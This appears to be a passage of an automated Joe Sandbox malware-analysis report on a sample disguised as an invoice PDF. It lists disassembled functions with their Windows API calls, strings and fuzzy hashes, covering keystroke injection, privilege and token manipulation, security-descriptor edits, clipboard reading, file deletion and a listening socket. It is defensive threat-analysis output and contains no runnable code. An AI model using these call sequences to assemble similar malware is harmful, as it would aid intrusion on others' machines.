SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 004A4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 004A4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 004A494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 004A495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 004A497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004A49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004A49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 004A4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004A4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004A4A7E
IsMenu.USER32(?), ref: 004A4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004A4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004A4B20
GetWindowLongW.USER32(?,000000F0), ref: 004A4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 004A4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 004A4C82
wsprintfW.USER32 ref: 004A4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004A4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 004A4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004A4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004A4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 004A4D5A

Strings

%d/%02d/%02d, xrefs: 004A4CA8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 47b1e27ef0af00bcec5feba13aa817d905274a1b36641bd5dc0b4e73f5f3ea08
Instruction ID: d4e54a8277d1ec3bdc5d3dffb94d56975de19d66760bfbbcc03ba14aa7d86c4f
Opcode Fuzzy Hash: 47b1e27ef0af00bcec5feba13aa817d905274a1b36641bd5dc0b4e73f5f3ea08
Instruction Fuzzy Hash: D812D171600214AFEB258F24DC49FAF7BF8AFD6314F10412AF515EA2E1DBB89941CB58

Function 0042F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0042F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0046F474
IsIconic.USER32(00000000), ref: 0046F47D
ShowWindow.USER32(00000000,00000009), ref: 0046F48A
SetForegroundWindow.USER32(00000000), ref: 0046F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046F4AA
GetCurrentThreadId.KERNEL32 ref: 0046F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0046F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0046F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0046F4DE
SetForegroundWindow.USER32(00000000), ref: 0046F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0046F4F6
keybd_event.USER32(00000012,00000000), ref: 0046F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0046F50B
keybd_event.USER32(00000012,00000000), ref: 0046F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0046F519
keybd_event.USER32(00000012,00000000), ref: 0046F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0046F528
keybd_event.USER32(00000012,00000000), ref: 0046F52D
SetForegroundWindow.USER32(00000000), ref: 0046F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0046F557

Strings

Shell_TrayWnd, xrefs: 0046F46F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 2b396dec389d5808e26e17054d6bf84b8e6eb8f18ddd4c07db2f3a4fc30e717a
Instruction ID: 6f0a8fd8c16c7855d3511cfa0acd8bab40b8d326641864457239685d22461f6e
Opcode Fuzzy Hash: 2b396dec389d5808e26e17054d6bf84b8e6eb8f18ddd4c07db2f3a4fc30e717a
Instruction Fuzzy Hash: 77315471B40328BFEB206BB55C8AFBF7E6CEB45B50F100076F601E61D1DAB55D00AA69

Function 00471201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 004716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0047170D
Part of subcall function 004716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0047173A
Part of subcall function 004716C3: GetLastError.KERNEL32 ref: 0047174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00471286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004712A8
CloseHandle.KERNEL32(?), ref: 004712B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004712D1
GetProcessWindowStation.USER32 ref: 004712EA
SetProcessWindowStation.USER32(00000000), ref: 004712F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00471310

Part of subcall function 004710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004711FC), ref: 004710D4
Part of subcall function 004710BF: CloseHandle.KERNEL32(?,?,004711FC), ref: 004710E9

Strings

default, xrefs: 0047130B
winsta0, xrefs: 004712CC
ZM, xrefs: 00471392
, xrefs: 0047125A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$ZM
API String ID: 22674027-4222036657
Opcode ID: a6e55c053f92d98545bab39f74817ef1d579333966202cd792fb20858496d431
Instruction ID: 5ebe5b4610c0680d9d62e6ad8f3315e4581e40c96d5973091170d4397814dd83
Opcode Fuzzy Hash: a6e55c053f92d98545bab39f74817ef1d579333966202cd792fb20858496d431
Instruction Fuzzy Hash: A481A171900209AFDF219FA8DC49FEF7FB9EF05704F14812AF914A62A0D7388944CB69

Function 00470B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00471114
Part of subcall function 004710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 00471120
Part of subcall function 004710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 0047112F
Part of subcall function 004710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 00471136
Part of subcall function 004710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0047114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00470BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00470C00
GetLengthSid.ADVAPI32(?), ref: 00470C17
GetAce.ADVAPI32(?,00000000,?), ref: 00470C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00470C6D
GetLengthSid.ADVAPI32(?), ref: 00470C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00470C8C
HeapAlloc.KERNEL32(00000000), ref: 00470C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00470CB4
CopySid.ADVAPI32(00000000), ref: 00470CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00470CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00470D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00470D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00470D45
HeapFree.KERNEL32(00000000), ref: 00470D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00470D55
HeapFree.KERNEL32(00000000), ref: 00470D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00470D65
HeapFree.KERNEL32(00000000), ref: 00470D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00470D78
HeapFree.KERNEL32(00000000), ref: 00470D7F

Part of subcall function 00471193: GetProcessHeap.KERNEL32(00000008,00470BB1,?,00000000,?,00470BB1,?), ref: 004711A1
Part of subcall function 00471193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00470BB1,?), ref: 004711A8
Part of subcall function 00471193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00470BB1,?), ref: 004711B7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 1b8153b32cc06ffeacdc767c23e31243b0441e50c6438e83969ba2ff51be4d39
Instruction ID: f75398bc8c1c949a0eff6f3967684da32f54ae3d3bbeb5faa71af6c81c44da00
Opcode Fuzzy Hash: 1b8153b32cc06ffeacdc767c23e31243b0441e50c6438e83969ba2ff51be4d39
Instruction Fuzzy Hash: 5A714C7190120AEFDF209FE4DC84BEFBBB8AF05304F148526E919A6291D779A905CF64

Function 0048EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(004ACC08), ref: 0048EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0048EB37
GetClipboardData.USER32(0000000D), ref: 0048EB43
CloseClipboard.USER32 ref: 0048EB4F
GlobalLock.KERNEL32(00000000), ref: 0048EB87
CloseClipboard.USER32 ref: 0048EB91
GlobalUnlock.KERNEL32(00000000), ref: 0048EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0048EBC9
GetClipboardData.USER32(00000001), ref: 0048EBD1
GlobalLock.KERNEL32(00000000), ref: 0048EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0048EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0048EC38
GetClipboardData.USER32(0000000F), ref: 0048EC44
GlobalLock.KERNEL32(00000000), ref: 0048EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0048EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0048EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0048ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0048ECF3
CountClipboardFormats.USER32 ref: 0048ED14
CloseClipboard.USER32 ref: 0048ED59

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 6b4e96f6a69040cf0d6115442954a480089e9f58b116ef10b6fea427e8af3e67
Instruction ID: 9306f0b11657eb8d9a23f21ffc00f9e261983ffbde9b1bd8d88eeb74486a11bb
Opcode Fuzzy Hash: 6b4e96f6a69040cf0d6115442954a480089e9f58b116ef10b6fea427e8af3e67
Instruction Fuzzy Hash: FC61F5352043029FD300EF26C884F6E7BE4AF85714F04496EF456872A2DB39ED45CB6A

Function 0048698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004869BE
FindClose.KERNEL32(00000000), ref: 00486A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00486A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00486A75

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00486AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00486ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00486B6A
%4d, xrefs: 00486BB1
%03d, xrefs: 00486DA2
%02d, xrefs: 00486C00, 00486C0A, 00486C5A, 00486CAA, 00486CFA, 00486D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00486B32

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: ee5141c81786cc6e576d0c0cbfe3a75ad2410c781dba17b1e7e1bbe456d71dd0
Instruction ID: 952399157b43fb10bf334b2d9b7ad416bf02b22bcdc3439a9c8d05a9a9766f16
Opcode Fuzzy Hash: ee5141c81786cc6e576d0c0cbfe3a75ad2410c781dba17b1e7e1bbe456d71dd0
Instruction Fuzzy Hash: BFD15371508300AFC714EBA5D891EAFB7ECAF88708F44491EF589C7291EB38DA44C766

Function 00489642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00489663
GetFileAttributesW.KERNEL32(?), ref: 004896A1
SetFileAttributesW.KERNEL32(?,?), ref: 004896BB
FindNextFileW.KERNEL32(00000000,?), ref: 004896D3
FindClose.KERNEL32(00000000), ref: 004896DE
FindFirstFileW.KERNEL32(*.*,?), ref: 004896FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0048974A
SetCurrentDirectoryW.KERNEL32(004D6B7C), ref: 00489768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00489772
FindClose.KERNEL32(00000000), ref: 0048977F
FindClose.KERNEL32(00000000), ref: 0048978F

Strings

*.*, xrefs: 004896F5

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: b37c28f8aa6febed70524a5c74c0ac3342af179ceccea51debf3ec7e05f1a97a
Instruction ID: 76abdfb5c3706c9f0603e01a83b8f067962f123f56fa04c96d695ab40ba92a32
Opcode Fuzzy Hash: b37c28f8aa6febed70524a5c74c0ac3342af179ceccea51debf3ec7e05f1a97a
Instruction Fuzzy Hash: 9431B432500619AADB10BFB4DC48AEF77AC9F49320F1845A7E805E2290EB38DD408B5C

Function 0048979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 004897BE
FindNextFileW.KERNEL32(00000000,?), ref: 00489819
FindClose.KERNEL32(00000000), ref: 00489824
FindFirstFileW.KERNEL32(*.*,?), ref: 00489840
SetCurrentDirectoryW.KERNEL32(?), ref: 00489890
SetCurrentDirectoryW.KERNEL32(004D6B7C), ref: 004898AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004898B8
FindClose.KERNEL32(00000000), ref: 004898C5
FindClose.KERNEL32(00000000), ref: 004898D5

Part of subcall function 0047DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0047DB00

Strings

*.*, xrefs: 0048983B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 582084bc44084f2350d59844ef028be15d9055e5863383b6f64733860eee3faf
Instruction ID: 2526aa5c16bd58def1cde4d971fda47a61c40baeea5adc0bf30615f079905b43
Opcode Fuzzy Hash: 582084bc44084f2350d59844ef028be15d9055e5863383b6f64733860eee3faf
Instruction Fuzzy Hash: 5A31A532500A1A6EDF10BFB5DC48AEF77AC9F06324F1845A7E814A2290DB38DD458B6C

Function 00488195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00488257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00488267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00488273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00488310
SetCurrentDirectoryW.KERNEL32(?), ref: 00488324
SetCurrentDirectoryW.KERNEL32(?), ref: 00488356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0048838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00488395

Strings

*.*, xrefs: 0048839B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 80373a1b7d3725b696cef15b87f7b1ed5e1f2b2db72753518e9ec4bd2d1dfda6
Instruction ID: 8c87cecdd7d48a25a21600357a76941b17b959492d1dc5e36fa3645ee2878ee6
Opcode Fuzzy Hash: 80373a1b7d3725b696cef15b87f7b1ed5e1f2b2db72753518e9ec4bd2d1dfda6
Instruction Fuzzy Hash: C6615B725043059FCB10EF61C88099FB3E9FF89318F44896EF98987251DB39E945CB9A

Function 0047D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00413AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00413A97,?,?,00412E7F,?,?,?,00000000), ref: 00413AC2

Part of subcall function 0047E199: GetFileAttributesW.KERNEL32(?,0047CF95), ref: 0047E19A

FindFirstFileW.KERNEL32(?,?), ref: 0047D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0047D1DD
MoveFileW.KERNEL32(?,?), ref: 0047D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0047D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0047D237

Part of subcall function 0047D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0047D21C,?,?), ref: 0047D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0047D253
FindClose.KERNEL32(00000000), ref: 0047D264

Strings

\*.*, xrefs: 0047D0CD, 0047D0D6, 0047D0EB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: ab3e878afe3e78b7a2919b87f7e4a0246e81ede9b548c1c78eb4d7cc027305ae
Instruction ID: c9bd246417695e58f40d9c310ba86c615feddd4b560745cbcdddbfd4be17de3e
Opcode Fuzzy Hash: ab3e878afe3e78b7a2919b87f7e4a0246e81ede9b548c1c78eb4d7cc027305ae
Instruction Fuzzy Hash: 50619271C1110D9FCF05EBE1C9929EDB775AF15304F2481AAE40677192EB386F4ACB68

Function 0048ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0048ED91
EmptyClipboard.USER32 ref: 0048ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0048EDAC
CloseClipboard.USER32 ref: 0048EEA3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: cd68f13ec782993252d30324e1fb8098c14ce5da59e5cb62fc8a2c464e88e98a
Instruction ID: f6a1ee12a9bf1f9d6cd9cfd059f083aaf3a7f76c7cfd54588a7e6f3cede820cf
Opcode Fuzzy Hash: cd68f13ec782993252d30324e1fb8098c14ce5da59e5cb62fc8a2c464e88e98a
Instruction Fuzzy Hash: 4141A235604611DFD310DF16D888B6ABBE1EF45318F14C4AAE4198B7A2C739EC42CB98

Function 0047E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0047170D
Part of subcall function 004716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0047173A
Part of subcall function 004716C3: GetLastError.KERNEL32 ref: 0047174A

ExitWindowsEx.USER32(?,00000000), ref: 0047E932

Strings

SeShutdownPrivilege, xrefs: 0047E902
@, xrefs: 0047E925
, xrefs: 0047E920
, xrefs: 0047E95C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: c0bb1e47f55966020c3eb9b5c09e81f143c2da03bb055d585ed43775d9d982f9
Instruction ID: 4121d37f4915808f1e42dbe2fa5f43559ff917019860fa529bbb4499c1d22683
Opcode Fuzzy Hash: c0bb1e47f55966020c3eb9b5c09e81f143c2da03bb055d585ed43775d9d982f9
Instruction Fuzzy Hash: B4012BF3610210ABEB5426B69C85FFB765C9708744F158667FA06F21D1D6685C40829C

Function 00491204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00491276
WSAGetLastError.WSOCK32 ref: 00491283
bind.WSOCK32(00000000,?,00000010), ref: 004912BA
WSAGetLastError.WSOCK32 ref: 004912C5
closesocket.WSOCK32(00000000), ref: 004912F4
listen.WSOCK32(00000000,00000005), ref: 00491303
